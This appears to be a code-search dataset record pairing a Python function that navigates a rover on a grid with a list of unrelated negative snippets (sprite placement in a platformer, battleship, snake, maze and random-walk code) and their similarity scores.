#calculate coordinates of the bag\n bag = pickupSprite('rope')\n # print('width = ' + str(self.block_width) + ' height = ' + str(self.block_height))\n bag.rect.x = self.block_width + (pos % 5) * self.room_side_length_x + x * self.block_width\n bag.rect.y = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height\n bag.player = self.player\n self.bagGroup.add(bag)\n elif rand == 1:\n #calculate coordinates of the bag\n bag = pickupSprite('knife')\n # print('width = ' + str(self.block_width) + ' height = ' + str(self.block_height))\n bag.rect.x = self.block_width + (pos % 5) * self.room_side_length_x + x * self.block_width\n bag.rect.y = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height\n bag.player = self.player\n self.bagGroup.add(bag)\n elif rand == 2:\n bag = pickupSprite('health')\n bag.rect.x = self.block_width + (pos % 5) * self.room_side_length_x + x * self.block_width\n bag.rect.y = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height\n bag.player = self.player\n self.bagGroup.add(bag)\n\n\n # if the cell is a 4 then it will be either a spike, if the space is on the bottom of the room,\n # otherwise it is a randomized block or nothing\n elif rooms[pos][y][x] is 4:\n # if the cell is at the bottom of the level, randomly choose whether to place a spike or not\n rand = random.randrange(0, 3)\n rand2 = random.randrange(0, 2)\n if y is 6 and rand is 1:\n spike = enemies.Spikes()\n spike.rect.x = self.block_width + (pos % 5) * self.room_side_length_x + x * self.block_width\n spike.rect.y = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height\n spike.player = self.player\n self.enemy_list.add(spike)\n # elif y is 6 and rand is 2:\n # dart = enemies.Darts(self.theme, 'up')\n # dart.rect.x = self.block_width + (pos % 5) * self.room_side_length_x + x * self.block_width\n # dart.rect.y = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height\n # dart.player = self.player\n # self.enemy_list.add(dart)\n elif y != 6 and rand2 is 0:\n if rooms[pos][y - 1][x] is 0:\n block = Platform(self.block_width, self.block_height, 'top', self.theme)\n else:\n block = Platform(self.block_width, self.block_height, 'middle', self.theme)\n block.rect.x = self.block_width + (pos % 5) * self.room_side_length_x + x * self.block_width\n block.rect.y = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height\n block.player = self.player\n self.platform_list.add(block)\n elif y != 6 and rand2 is 1:\n if x-1 >= 0 and x+1 <= self.blocks_per_room_x and y-1 >= 0 and y+1 < self.blocks_per_room_y:\n if rooms[pos][y][x-1] is 0:\n direction = 'left'\n blockType = 'middle'\n elif rooms[pos][y][x+1] is 0:\n direction = 'right'\n blockType = 'middle'\n elif rooms[pos][y-1][x] is 0:\n direction = 'up'\n blockType = 'top'\n elif rooms[pos][y+1][x] is 0:\n direction = 'down'\n blockType = 'middle'\n else:\n direction = None\n if direction is not None:\n # use for both block and dart\n rectX = self.block_width + (pos % 5) * self.room_side_length_x + x * self.block_width\n rectY = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height\n\n block = Platform(self.block_width, self.block_height, blockType, self.theme)\n block.rect.x = rectX\n block.rect.y = rectY\n block.player = self.player\n self.platform_list.add(block)\n\n dart = enemies.Darts(self.theme, direction)\n dart.rect.x = rectX\n dart.rect.y = rectY\n dart.player = self.player\n self.enemy_list.add(dart)\n # this is the starting and ending points of the level\n elif rooms[pos][y][x] is 7:\n # exit of the game on the top row of the level\n if pos // 5 is 0:\n #calculate coordinates of the exit\n self.exit_coords['x'] = self.block_width + (pos % 5) * self.room_side_length_x + x * self.block_width\n self.exit_coords['y'] = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height\n exit = exit_door_sprite(self.block_width, self.block_height)\n # print('width = ' + str(self.block_width) + ' height = ' + str(self.block_height))\n exit.rect.x = self.exit_coords['x']\n exit.rect.y = self.exit_coords['y']\n exit.player = self.player\n self.exit_sprite.add(exit)\n #entance of the game on the bottom row of the level\n elif pos // 5 is 4:\n #calculate coordinates of the entrance\n self.entrance_coords['x'] = self.block_width + (pos % 5) * self.room_side_length_x + x * self.block_width\n self.entrance_coords['y'] = self.block_height + (pos // 5) * self.room_side_length_y + y * self.block_height", "def change_cell(self):\n\n x, mu = self.update_position_direction(self.l_edge)\n mu_mean = self.calculate_mean_mu(self.x, x, self.l_edge)\n self.update_estimators(self.l_edge, mu_mean)\n\n if self.next_cell_index == self.grid.Ncells:\n # packet escapes\n self.is_escaped = True\n self.is_active = False\n self.mu = mu\n self.x = self.cell_xr\n\n elif self.next_cell_index == -1:\n\n raise GeometryException(\"No inner boundary in homogeneous sphere\")\n\n else:\n # packet is transported into target cell\n\n self.mu = mu\n\n if self.next_cell_index > self.cell_index:\n # packet is moved one cell to the right\n\n self.x = self.grid.xl[self.next_cell_index]\n\n else:\n # packet is moved one cell to the left\n\n self.x = self.grid.xr[self.next_cell_index]\n\n # reset cell-based properties for easy access\n self.cell_index = self.next_cell_index\n self.cell_chi = self.grid.chi[self.cell_index]\n self.cell_xl = self.grid.xl[self.cell_index]\n self.cell_xr = self.grid.xr[self.cell_index]\n self.cell_dx = self.grid.dx[self.cell_index]\n self.cell_dV = self.grid.dV[self.cell_index]\n\n # recalculate distances\n self.calculate_and_set_propagation_distances()", "def make_move(self, direction):\r\n\t\tif direction == 0:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x-1][self.y] = self.board[self.x-1][self.y], self.board[self.x][self.y]\r\n\t\t\tself.x -= 1\r\n\r\n\t\telif direction == 1:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x][self.y+1] = self.board[self.x][self.y+1], self.board[self.x][self.y]\r\n\t\t\tself.y += 1\r\n\r\n\t\telif direction == 2:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x+1][self.y] = self.board[self.x+1][self.y], self.board[self.x][self.y]\r\n\t\t\tself.x += 1\r\n\r\n\t\telif direction == 3:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x][self.y-1] = self.board[self.x][self.y-1], self.board[self.x][self.y]\r\n\t\t\tself.y -= 1", "def spawn(self):\r\n self.direction = utils.RANDOM.random()*math.pi*2 - math.pi\r\n self.redraw_image()\r\n self.speed = 0\r\n self.ammo = self.world.level.DEFAULT_AMMO\r\n self.alive = True\r\n self.kills = 0\r\n \r\n # Find a spawn point.\r\n # This loop might in theory take forever to return. In practice,\r\n # it returns within a reasonable number of iterations\r\n\r\n self.rect.center = self.team.get_spawn_point()\r\n while self.world.is_colliding(self):\r\n self.rect.centerx += utils.RANDOM.choice((-10, 10))\r\n self.rect.centery += utils.RANDOM.choice((-10, 10))\r\n self.rect.clamp_ip(self.world.rect) #never search outside the world\r\n \r\n #location keeps a floating point representation of the center of the\r\n #agent, mirroring the self.rect.center with higher precision.\r\n self.location = self.rect.center\r\n\r\n self.team.stats[\"spawns\"] += 1", "def aggrandir_serpent():\n\n (i,j)=coordonnees_serpent[0]\n \n if direction==0 :\n pass\n\n elif direction == \"haut\" :\n serpent.insert(0,\n TERRAIN.create_rectangle(i* coté, j * coté, i * coté+ coté, j * coté + coté, fill = \"green\", outline = 'green'))\n coordonnees_serpent.insert(0,(i,j-1))\n\n elif direction == \"bas\" :\n serpent.insert(0,\n TERRAIN.create_rectangle(i* coté, j * coté, i * coté+ coté, j * coté + coté, fill = \"green\", outline = 'green'))\n coordonnees_serpent.insert(0,(i,j+1))\n\n elif direction == \"droite\" :\n serpent.insert(0,\n TERRAIN.create_rectangle(i* coté, j * coté, i * coté+ coté, j * coté + coté, fill = \"green\", outline = 'green'))\n coordonnees_serpent.insert(0,(i+1,j))\n\n elif direction == \"gauche\" :\n serpent.insert(0,\n TERRAIN.create_rectangle(i* coté, j * coté, i * coté+ coté, j * coté + coté, fill = \"green\", outline = 'green'))\n coordonnees_serpent.insert(0,(i-1,j))", "def _place(player, size, length, number):\n\n if number == 0:\n return\n name = player.name\n ship = player.board.fleet.name_ship(length)\n print \"\\n%s, please place your %s. (Length: %s)\\n\" % (name, ship, length)\n\n player.board.display(True)\n\n coord = man_coord(size)\n x = coord[0]\n y = coord[1]\n direct = man_dir()\n\n if player.board.check(x, y, length, direct) is True:\n name = player.fleet.name_ship(length)\n player.fleet.add_ship(name, x, y, length, direct)\n return _place(player, size, length, number - 1)\n print \"\\nSorry, that ship won't fit, please try again.\"\n return _place(player, size, length, number)", "def saveRoboPath(self):\r\n if time.time()-self.timeold > 2: \r\n self.RoboPath.append([round(self.RoboPosX,1),round(self.RoboPosY,1)])\r\n self.timeold = time.time()", "def create_grid(player1: game_code.Player, player2: game_code.Player) -> None:\r\n status = True\r\n abort = False\r\n\r\n # Initialize two game board both with randomized ship placements\r\n player_1 = game_code.RandomizedBattleshipGame()\r\n player_2 = game_code.RandomizedBattleshipGame()\r\n\r\n player_1_sequence = []\r\n player_2_sequence = []\r\n player_1_previous_move = None\r\n player_2_previous_move = None\r\n\r\n save_initial_state1 = player_1\r\n save_initial_state2 = player_2\r\n\r\n escape = instruction_font.render('HIT ESC TO RETURN TO THE MAIN MENU OR TO START A NEW GAME', False,\r\n (255, 255, 255))\r\n player_label_1 = label_font.render('Player 1', False, (255, 255, 255))\r\n player_label_2 = label_font.render('Player 2', False, (255, 255, 255))\r\n\r\n while status:\r\n screen.blit(background, (0, 0))\r\n\r\n # Draw the grids belonging to each player\r\n for column in range(0, 8):\r\n for row in range(0, 8):\r\n cell = pygame.Rect((190 + column * 50, 160 + row * 50), (50, 50))\r\n pygame.draw.rect(screen, (255, 255, 255, 1), cell, 0)\r\n pygame.draw.rect(screen, (0, 0, 0, 1), cell, 3)\r\n\r\n for column in range(0, 8):\r\n for row in range(0, 8):\r\n cell = pygame.Rect((690 + column * 50, 160 + row * 50), (50, 50))\r\n pygame.draw.rect(screen, (255, 255, 255, 1), cell, 0)\r\n pygame.draw.rect(screen, (0, 0, 0, 1), cell, 3)\r\n\r\n # Display labels and text\r\n screen.blit(player_label_1, (340, 580))\r\n screen.blit(player_label_2, (840, 580))\r\n screen.blit(escape, (25, 685))\r\n\r\n columns = 'ABCDEFGH'\r\n rows = '12345678'\r\n # Label Player 1 Board\r\n for letter in range(0, 8):\r\n label = label_font.render(columns[letter], False, (255, 255, 255))\r\n screen.blit(label, (205 + letter * 50, 125))\r\n for number in range(0, 8):\r\n label = label_font.render(rows[number], False, (255, 255, 255))\r\n screen.blit(label, (165, 170 + number * 50))\r\n # Label Player 2 Board\r\n for letter in range(0, 8):\r\n label = label_font.render(columns[letter], False, (255, 255, 255))\r\n screen.blit(label, (705 + letter * 50, 125))\r\n for number in range(0, 8):\r\n label = label_font.render(rows[number], False, (255, 255, 255))\r\n screen.blit(label, (665, 170 + number * 50))\r\n\r\n # Display the ships prior to starting the game\r\n display_ships(save_initial_state1, True)\r\n display_ships(save_initial_state2, False)\r\n\r\n if player_1_previous_move is None and player_2_previous_move is None:\r\n pygame.display.update()\r\n pygame.time.wait(1000)\r\n\r\n while player_1.get_winner() is None and player_2.get_winner() is None and not abort:\r\n\r\n # player1 shot on player2 Board\r\n player_1_previous_move = player1.make_move(player_2, player_1_previous_move)\r\n player_2.make_move(player_1_previous_move)\r\n player_1_sequence.append(player_1_previous_move)\r\n if player_2.get_winner() is not None:\r\n break\r\n # player1 on player2 Board\r\n player_2_previous_move = player2.make_move(player_1, player_2_previous_move)\r\n player_1.make_move(player_2_previous_move)\r\n player_2_sequence.append(player_2_previous_move)\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n abort = True\r\n status = False\r\n\r\n display_ships(player_1, True)\r\n pygame.time.wait(500)\r\n pygame.display.update()\r\n pygame.time.wait(500)\r\n display_ships(player_2, False)\r\n pygame.display.update()\r\n\r\n # Display the victory message of the winning player\r\n if player_1.get_winner() == 'Lost':\r\n winner = 'Player 2'\r\n victory = message_font.render(winner + ' Wins!', False, (255, 255, 255))\r\n screen.blit(victory, (450, 50))\r\n else:\r\n winner = 'Player 1'\r\n victory = message_font.render(winner + ' Wins!', False, (255, 255, 255))\r\n screen.blit(victory, (450, 50))\r\n\r\n # Display the final state of the game\r\n display_ships(player_1, True)\r\n display_ships(player_2, False)\r\n\r\n # Check for user input\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n status = False\r\n\r\n pygame.display.update()", "def WallsPosition():\n\tcnt=40\n\twhile cnt>0:\n\t\ta=random.randint(0,15)\n\t\tb=random.randint(0,35)\n\t\tif(board[a][b]=='.'):\n\t\t\tboard[a][b]='X'\n\t\t\tcnt=cnt-1", "def addRover(self, rover):\n self.roverList.append(rover)", "def move(self, direction):\n newx = self.x\n newy = self.y\n newy += random.randint(-1, 1)\n newx += random.randint(-1, 1)\n if self.tmap.contents[newy][newx] != '#':\n self.x = newx\n self.y = newy", "def move(player, direction):\r\n \r\n curRoom = world.maps.World.mapGrid[player.room]\r\n door = curRoom.dirs[direction]\r\n roomid = world.maps.World.doors[door].getExitRoom(curRoom.id)\r\n newRoom = world.maps.World.mapGrid[roomid]\r\n brokesneak = False\r\n \r\n if player.getAttr(SNEAKING) and not utils.gameutils.stealthRoll(player):\r\n player.setAttr(SNEAKING, False)\r\n sendToRoomNotPlayer(player, \"{0}You notice {1} sneaking out to the {2}.\".format(LRED, player, DIRS[direction])) \r\n sendToPlayer(player, \"{0}You make a sound\".format(LRED))\r\n brokesneak = True\r\n elif not player.getAttr(SNEAKING): \r\n sendToRoomNotPlayer( player, \"{0} left to the {1}.\".format(player, DIRS[direction])) \r\n \r\n del curRoom.players[player.name]\r\n newRoom.players[player.name] = player\r\n player.room = newRoom.id\r\n\r\n if brokesneak:\r\n sendToRoomNotPlayer(player, \"{0}You notice {1} sneaking into the room from the {2}.\".format(LRED, player, DIRS[OPPOSITEDIRS[direction]])) \r\n elif not player.getAttr(SNEAKING):\r\n sendToRoomNotPlayer(player, \"{0} entered from the {1}.\".format(player, DIRS[OPPOSITEDIRS[direction]])) \r\n \r\n displayRoom(player, player.room)\r\n player.stats[MOVING] = False", "def move(self):\n \n self.rect.move_ip(0,self.speed) # Funcion para mover el enemigo especificando la velocidad xy\n \n if (self.rect.top > SCREEN_HEIGHT): # Condicion cuando llega a la parte inferior y no colisiono con el jugador\n del self.surf #Libera memoria\n del self.rect\n self.randomNumber = random.choice([70,64,32]) # Su tamaño se asigna nuevamente\n self.size = (self.randomNumber,self.randomNumber) #Se genera su tamaño como un cuadrado de lado aleatorio\n self.surf = pygame.Surface(self.size) #Se genera la superficie que aparecera la pantalla\n self.surf.fill(RED)\n self.rect = self.surf.get_rect(center = (random.randint(40,SCREEN_WIDTH-40),0))# me da info de las coordenadas de surf\n if(self.randomNumber == 32):\n self.surf = self.imagen\n elif(self.randomNumber ==64):\n self.surf = self.imagen2\n elif self.randomNumber ==70 :\n self.surf = self.imagen3", "def make_move(self, tower):\r\n height, index = self.__find_random_moves(tower)\r\n \r\n if self.stat_brain.all_valid(tower) == 0 or self.stat_brain.is_valid(height, index, tower):\r\n return height, index\r\n else:\r\n while not self.stat_brain.is_valid(height, index, tower):\r\n height, index = self.__find_random_moves(tower)\r\n \r\n return height, index", "def fill_walk(self):\n\n #Seguir tomando caminos hasta que se alcance la cantidad establecida.\n while len(self.x_values) < self.num_points:\n\n #Decidir cual direccion tomar y cuan lejos ir hacia esa direccion.\n x_direction = choice([1, -1])\n x_distance = choice([0, 1, 2, 3, 4])\n x_step = x_direction * x_distance\n\n y_direction = choice([1,-1])\n y_distance = choice([0, 1, 2, 3, 4])\n y_step = y_direction * y_distance\n\n #Ignorar movimientos nulos.\n if x_step == 0 and y_step == 0:\n continue\n\n #Calcular la nueva posicion.\n x = self.x_values[-1] + x_step\n y = self.y_values[-1] + y_step\n\n self.x_values.append(x)\n self.y_values.append(y)", "def move(self, new_home):\n #checked#\n ###your code here###\n if self.home!=None:\n self.home.occupant=None\n new_home.occupant=self\n self.home=new_home", "def place_exit(self):\r\n x = random.randint(0, (self.__nx - 1))\r\n y = random.randint(0, (self.__ny - 1))\r\n self.__exit_room = x, y\r\n if self.exit_room() == self.pillar_a_room() or \\\r\n self.exit_room() == self.pillar_e_room() or \\\r\n self.exit_room() == self.pillar_i_room() or \\\r\n self.exit_room() == self.pillar_p_room() or \\\r\n self.exit_room() == self.entrance_room():\r\n return self.place_exit()\r\n self.__maze[x][y].set_exit(True)" ]
[ "0.62105554", "0.620282", "0.59880394", "0.5978847", "0.5967129", "0.5945851", "0.5943394", "0.59243786", "0.5899155", "0.5898589", "0.5803447", "0.5776576", "0.5759452", "0.5755554", "0.5738934", "0.57336867", "0.5733618", "0.5726307", "0.57162607", "0.5699025", "0.5692675", "0.5677311", "0.56651026", "0.56284827", "0.56274664", "0.56126356", "0.56100196", "0.56078", "0.56078", "0.55932343", "0.5590871", "0.558711", "0.55827636", "0.55826247", "0.55692273", "0.5566758", "0.55522287", "0.5550628", "0.55393565", "0.5533918", "0.5530434", "0.5527034", "0.55216223", "0.54955065", "0.5495043", "0.5485583", "0.5481483", "0.54745597", "0.54741764", "0.547389", "0.5471458", "0.5451194", "0.5444977", "0.54446965", "0.54407126", "0.5429447", "0.54290426", "0.5426966", "0.5426145", "0.5401077", "0.5398895", "0.53961456", "0.5393413", "0.53925043", "0.5388645", "0.5387758", "0.538195", "0.53798413", "0.5377749", "0.5376276", "0.5367685", "0.5364699", "0.5361238", "0.535794", "0.5350529", "0.5346746", "0.5345112", "0.53420347", "0.5339941", "0.5339807", "0.5334795", "0.5333292", "0.5332544", "0.5332472", "0.5330408", "0.5329506", "0.5326436", "0.53182966", "0.53178245", "0.53170055", "0.5310794", "0.531005", "0.530804", "0.53076583", "0.5306072", "0.53044444", "0.5304288", "0.53033036", "0.530189", "0.53007513" ]
0.68636113
0
Tries to navigate and reposition the rover on the gird. Throws an exception if It cannot find that rover on the grid A bad instruction is passed Executing the instruction string will cause a collision with another rover on the gird
def navigate_rover(self, name, instruction_str): rover = self.rovers.get(name) if not rover: raise RoverException(ExceptionMessages.BAD_NAME) coordinate = copy.deepcopy(rover.coordinate) direction = rover.direction for instruction in instruction_str: if instruction == 'L' or instruction == 'R': direction = self._direction_after_turning(direction, instruction) elif instruction == 'M': coordinate = self._coordinate_after_moving(direction, coordinate) else: raise RoverException(ExceptionMessages.INVALID_INSTRUCTION) # This means we have processed all the instructions without exception # assign new direction and coordinates to rover rover.direction = direction rover.coordinate = coordinate
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def process_rover(grid, start_at, instructions, name='rover'):\n plateu = None\n try:\n if isinstance(grid, str):\n x_end, y_end = grid.split(' ')\n x_end = int(x_end)\n y_end = int(y_end)\n plateu = Plateu(x_end, y_end, name)\n\n elif isinstance(grid, Plateu):\n plateu = grid\n\n else:\n raise ValueError(\"'grid' must be of type str or Plateu.\")\n\n except Exception as e:\n # Error handling code here for plateu here.\n print(e.message)\n return e # Should be re-raises and handled by API, CLI, etc.\n\n try:\n x, y, f = start_at.split(' ')\n x = int(x)\n y = int(y)\n rover = Rover(x, y, f, plateu, name)\n for i in range(len(instructions)):\n rover.position_rover(instructions[i])\n # Leaving this in comments for later debugging.\n # print(instructions[i] +\n # repr(rover.position_rover(instructions[i])))\n\n except Exception as e:\n # Error handling code here for rover here.\n print(e.message)\n return e # Should be re-raises and handled by API, CLI, etc.\n\n print(rover.get_position())\n return rover", "def test_7_replay_4(self):\n self._execute_replay_nr(4)\n\n self.grid.add_pawn(5, 'H')\n self.grid.add_pawn(3, 'B')\n self.grid.add_pawn(2, 'H')\n self.grid.add_pawn(1, 'B')\n self.grid.add_pawn(1, 'H')\n\n # self.grid.print_grid()\n # print(self.minmaxBot_7.choose_move(self.grid))", "def move(self):\n # neighbor offsets\n offset = [(-1, 1),(0, 1),(1, 1),(-1, 0),(1, 0),(-1, -1),(0, -1),(1, -1)]\n for i in range(len(offset)):\n x = self.x + offset[i][0] # neighboring coordinates\n y = self.y + offset[i][1]\n if self.island.animal(x, y) == 0: # neighboring spot is open\n self.island.remove(self) # remove from current spot\n self.x = x # new coordinates\n self.y = y\n self.island.register(self) # register new coordinates\n break # finished with move", "def move(self):\n # neighbor offsets\n offset = [(-1, 1),(0, 1),(1, 1),(-1, 0),(1, 0),(-1, -1),(0, -1),(1, -1)]\n for i in range(len(offset)):\n x = self.x + offset[i][0] # neighboring coordinates\n y = self.y + offset[i][1]\n if self.island.animal(x, y) == 0: # neighboring spot is open\n self.island.remove(self) # remove from current spot\n self.x = x # new coordinates\n self.y = y\n self.island.register(self) # register new coordinates\n break # finished with move", "def move_right():\n return __maze.move_right()", "def test_rover_position(self):\n rover = Rover(self.plateau_dimensions, self.rover_initial_position, Rover.DIRECTIONS.get('E'))\n rover.execute_instructions(\"LMLM\")\n self.assertEqual(rover._position.x, 1)\n self.assertEqual(rover._position.y, 2)\n self.assertEqual(rover.get_heading, 'W')", "def nextmove(x,y,xr,yr,count,xsgn=1,ysgn=1,redo=False,redo_fail=False,back=False,\n noback=False,backret=True,wander=True,silent=False):\n\n global BTRACK, GSTRUC, NPIX\n\n endflag = False\n \n\n # This is the very end \n if (x==xr[1] and y==yr[1]):\n endflag = True\n return None,None,None,None,None,False,False,endflag\n \n\n # If back, redo and BACKRET=1 then return to pre-redo position\n #=============================================================\n # This is done separately from the normal algorithm \n if backret and back and redo: \n back = False\n lastcount = BTRACK['count']\n newx = BTRACK['data'][-1]['lastx']\n newy = BTRACK['data'][-1]['lasty']\n lastx = BTRACK['data'][-1]['x']\n lasty = BTRACK['data'][-1]['y']\n par0 = BTRACK['data'][-1]['par'] # parameters from the current position\n\n # p0 is the redo position, p5 is the pre-redo position \n p0,res0 = gfind(lastx,lasty,xr=xr,yr=yr)\n p5,res5 = gfind(newx,newy,xr=xr,yr=yr)\n\n b,dbic = gbetter(res0,res5)\n redo = gredo(newx,newy,lastx,lasty,par0) \n\n # back position better, redo pre-redo position \n if (dbic<0) and redo: \n # Getting the guess\n guesspar,guessx,guessy = gguess(x,y,xr,yr,xsgn,ysgn)\n redo = True\n skip = False\n # back position worse, or can't redo pre-position, skip \n else:\n redo = False\n skip = True\n guesspar,guessx,guessy = None,None,None\n \n return newx,newy,guessx,guessy,guesspar,back,redo,skip,endflag\n\n\n # Redo Failed! Return to original position\n # If we went back and backret=1 then return to pre-redo position\n # if we went forward then don't do anything, should continue forward \n if redo and redo_fail and back: \n # Go back to pre-redo position and skip\n newx = BTRACK[-1]['data']['lastx']\n newy = BTRACK[-1]['data']['lasty']\n skip = True\n return newx,newy,None,None,None,False,False,skip,endflag\n \n\n # Some default values\n skip = False\n newx,newy = None,None\n guesspar,guessx,guessy = None,None,None\n\n \n # Positions\n #\n # ^ Y P2 \n # | P3 P0 P1\n # | P4\n # --------> X\n \n # Get the positions, THIS IS THE PROPER WAY TO DO IT!!!!! \n x1,y1 = gincrement(x,y,xr,yr,xsgn=xsgn,ysgn=ysgn)\n x2,y2 = gincrement(x,y,xr,yr,xsgn=xsgn,ysgn=ysgn,p2=True) \n x3,y3 = gincrement(x,y,xr,yr,xsgn=-xsgn,ysgn=-ysgn)\n x4,y4 = gincrement(x,y,xr,yr,xsgn=xsgn,ysgn=-ysgn,p2=True)\n\n # Have they been visited before?\n # ps are 0 or 1\n p0,res0 = gfind(x,y,xr=xr,yr=yr)\n par0 = res0['par']\n p1,res1 = gfind(x1,y1,xr=xr,yr=yr)\n p2,res2 = gfind(x2,y2,xr=xr,yr=yr)\n p3,res3 = gfind(x3,y3,xr=xr,yr=yr)\n p4,res4 = gfind(x4,y4,xr=xr,yr=yr)\n\n # Comparing the solutions at neighboring positions\n # bs are 0, 1 or -1\n b1,dbic1 = gbetter(res0,res1)\n res1['better'] = b1\n res1['dbic'] = dbic1\n b2,dbic2 = gbetter(res0,res2)\n res2['better'] = b2\n res2['dbic'] = dbic2\n b3,dbic3 = gbetter(res0,res3)\n res3['better'] = b3\n res3['dbic'] = dbic3\n b4,dbic4 = gbetter(res0,res4)\n res4['better'] = b4\n res4['dbic'] = dbic4 \n \n # Do we need to redo?\n red1,red2,red3,red4 = False,False,False,False\n if (p1==1) and (b1==0): \n red1 = True\n if (p2==1) and (b2==0): \n red2 = True\n if (p3==1) and (b3==0): \n red3 = True\n if (p4==1) and (b4==0): \n red4 = True\n\n xx = [x1,x2,x3,x4]\n yy = [y1,y2,y3,y4]\n pp = [p1,p2,p3,p4]\n bb = [b1,b2,b3,b4]\n rr = [red1,red2,red3,red4]\n \n # Printing out the info\n if silent==False:\n if count>0:\n print(' ')\n print('Count = %d' % count)\n print('Last/Current Position = (%d,%d)' %(x,y))\n print('Neighbors (position) visited better redo')\n for i in range(4):\n if xx[i] is not None:\n strx = '%5d' % xx[i]\n else:\n strx = '-----'\n if yy[i] is not None:\n stry = '%5d' % yy[i]\n else:\n stry = '-----' \n print('P%1d (%5s,%5s) %7d %7d %7s' % (i+1,strx,stry,pp[i],bb[i],str(rr[i]))) \n print('')\n\n \n # If P3 or P4 worse than P0 then move back to worst decomp \n # If P3 and P4 better than P0 then move forward,\n # -if both have been visited before then do the worst decomp \n # -if neither has been visited before then move to P1. \n\n \n\n # Starting Normal Algorithm\n # (not redo+back+backred)\n #==========================\n\n # More generic algorithm, checks all 4 positions and possible redos\n newscheme = True\n if noback==False and newscheme:\n endflag = False\n res1['redo'] = False\n if res1['visited']==True:\n res1['redo'] = gredo(res1['x'],res1['y'],x,y,par0)\n res2['redo'] = False\n if res2['visited']==True:\n res2['redo'] = gredo(res2['x'],res2['y'],x,y,par0) \n res3['redo'] = False\n if res3['visited']==True:\n res3['redo'] = gredo(res3['x'],res3['y'],x,y,par0) \n res4['redo'] = False\n if res4['visited']==True:\n res4['redo'] = gredo(res4['x'],res4['y'],x,y,par0)\n res = [res1,res2,res3,res4]\n redos = [res1['redo'],res2['redo'],res3['redo'],res4['redo']]\n dbic = np.array([res1['dbic'],res2['dbic'],res3['dbic'],res4['dbic']])\n toredo, = np.where((np.array(redos)==True) & (dbic<0))\n # Some redos\n if len(toredo)>0:\n # Find the one with the worst solution\n if len(toredo)>1:\n best1 = np.argmin(dbic[toredo])\n best = toredo[best1]\n else:\n best = toredo[0]\n if best>=2:\n back = True\n else:\n back = False\n newres = res[best]\n newx,newy = newres['x'],newres['y']\n guessx,guessy,guesspar = x,y,par0\n redo = True\n # No redos, more foward to P1\n else:\n redo = False\n back = False\n newx,newy = x1,y1\n guessx,guessy,guesspar = x,y,par0\n # if we already visited P1, then skip\n if res1['visited']:\n skip = True\n else:\n skip = False\n \n return newx,newy,guessx,guessy,guesspar,back,redo,skip,endflag\n \n # check if the position is a \"valid\" one\n # check if it was previously visited\n # check if it CAN be redone\n # for all that can be redone, which one has the largest negative dbic (worse solution)\n \n \n\n #============================== \n #---- CHECKING BACKWARDS ----\n #============================== \n if ((p3==1) or (p4==1)) and (noback==False): \n\n # Only P3 visited before\n #=======================\n if (p3==1) and (p4==0): \n # Can this position be redone\n redo = gredo(x3,y3,x,y,par0)\n # P3 worse than P0, moving back\n #------------------------------\n if (b3==0) and redo: \n newx,newy = x3,y3\n back = True # moving backwards\n guessx,guessy,guesspar = x,y,par0\n else: \n back = False\n redo = False\n\n # Only P4 visited before\n #=======================\n elif (p3==0) and (p4==1): \n # Can this position be redone\n redo = gredo(x4,y4,x,y,par0)\n # P4 worse than P0, moving back\n #------------------------------\n if (b4==0) and redo: \n newx,newy = x4,y4\n back = True # moving backwards\n guessx,guessy,guesspar = x,y,par0\n else: \n back = False\n redo = False\n\n # Both visited before\n #====================\n elif (p3==1) and (p4==1): \n redo = False # not redo unless proven otherwise \n # Can these positions be redone\n redo3 = gredo(x3,y3,x,y,par0) \n redo4 = gredo(x4,y4,x,y,par0) \n\n # P3 worse than P0, but P4 better than P0 (or no gauss) (b3==0 and b4!=0)\n #----------------------------------------\n if (b3==0) and (b4!=0): \n # We can redo it, moving back to P3 \n if redo3:\n redo = True\n newx,newy = x3,y3\n # Can't redo, move forward \n else:\n redo = False\n back = False\n\n # P4 worse than P0, but P3 better than P0 (or no gauss) (b3!=0 and b4==0)\n #----------------------------------------\n elif (b3!=0) and (b4==0): \n # We can redo it, moving back to P4 \n if redo4:\n redo = True\n newx,newy = x4,y4\n # Can't redo, move forward \n else: \n redo = False\n back = False\n\n # Both P3 and P4 are worse than P0\n #---------------------------------\n elif (b3==0) and (b4==0): \n # Can redo either one, redo the one with the worse solution\n if redo3 and redo4:\n redo = True\n b34,dbic34 = gbetter(res3,res4)\n # Moving back to P3 (P3 worse than P4) \n if (b34==1): # to P3 \n newx,newy = x3,y3\n # Moving back to P4 (P4 worse than P3)\n if (b34==0): # to P4 \n newx,newy = x4,y4\n # Can't redo P4, go to P3 \n if redo3 and (redo4==False):\n redo = True\n newx,newy = x3,y3 # to P3\n # Can't redo P3, go to P4 \n if (redo3==False) and redo4:\n redo = True\n newx,newy = x4,y4 # to P4\n # Can't do either, move forward \n if (redo3==False) and (redo4==False): \n redo = False \n back = False\n\n # Both are better than P0 or both no Gaussians, move forward\n #-----------------------------------------------------------\n elif (b3!=0) and (b4!=0):\n back = False\n redo = False\n\n # Shouldn't ever happen\n else:\n import pdb; pdb.set_trace()\n \n # One is worse than P0\n #---------------------\n if redo: \n back = True # moving backwards \n guessx,guessy,guesspar = x,y,par0\n\n # Neither visited before, backwards not possible\n # p3==0 and p4==0\n else:\n back = False\n\n\n #==============================\n # ---- CHECKING FORWARD ----\n #==============================\n if ((p3==0) and (p4==0)) or (back==False) or noback: \n\n # This is the very end \n if (x1 is None) or (x==xr[1] and y==yr[1]):\n endflag = True\n return None,None,None,None,None,False,False,False,endflag\n\n back = False # moving forward \n\n # Only P1 has been visited before\n #================================\n if 